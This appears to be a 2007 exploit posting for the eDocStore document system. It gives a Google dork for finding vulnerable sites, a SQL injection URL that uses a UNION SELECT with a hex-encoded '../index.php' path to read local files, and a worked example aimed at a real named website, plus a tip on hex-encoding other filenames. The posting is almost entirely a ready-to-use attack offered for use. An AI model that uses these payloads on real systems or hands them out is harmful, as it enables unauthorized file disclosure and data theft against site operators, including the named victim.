Home / os / winme

edocstore-sql.txt

Posted on 27 June 2007

--==+================================================================================+==-- --==+ eDocStore Latest Versions Local File Inclusion Vulnerbilitys +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog (good work xprog) SCRIPT DOWNLOAD: N/A SITE: http://www.edocstore.co.uk DORK: intext:"Powered by eDocStore" EXPLOITS: EXPLOIT 1: http://www.server.com/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null EXAMPLES: EXAMPLE 1: http://www.nwal.org/essentials/minutes/doc.php?action=inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2F696E6465782E706870,0x746578742F706C61696E,null,null,null,null,null Note/Tip: The filename for the incluson has got to be hexed before you can include it. Its only required to replace the first hex value before the "," GREETZ: h4cky0u.org, G0t-Root.Net FROM GM: Kw3[R]ln Get over it! --==+================================================================================+==-- --==+ eDocStore Latest Versions Local File Inclusion Vulnerbilitys +==-- --==+================================================================================+==--

 

TOP